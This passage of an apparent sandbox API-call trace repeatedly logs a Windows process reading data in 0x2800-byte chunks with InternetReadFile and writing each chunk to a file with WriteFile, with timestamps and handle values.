lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.704] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.742] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.743] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.744] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.744] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.758] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.759] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.767] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.767] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.768] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.768] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.794] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.795] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.795] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.796] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.801] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.802] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.802] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.803] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.807] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.807] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.811] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.812] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.837] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.837] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.838] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.839] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.840] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.840] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.844] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.844] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.850] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.854] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.857] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.857] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.857] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.858] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.858] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.858] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.859] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.859] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.860] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.860] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.860] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.861] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.861] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.861] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.862] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.862] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.863] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.864] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.865] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.865] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.880] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.880] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.881] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.882] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.883] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.884] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.885] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.886] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.888] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.889] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.889] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.890] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.891] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.892] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.894] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.894] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.894] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.895] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.896] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.898] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.898] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.898] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.899] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.899] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.900] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.901] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.901] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.902] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.902] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.903] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.904] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.904] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.905] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.905] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.905] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.906] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.906] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.907] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.907] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.908] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.909] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.909] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.922] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.922] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.923] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.924] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.927] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.928] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.929] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.931] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0077.932] WriteFile (in: hFile=0x6b8, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0077.933] InternetReadFile (in: hFile=0xcc0024, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 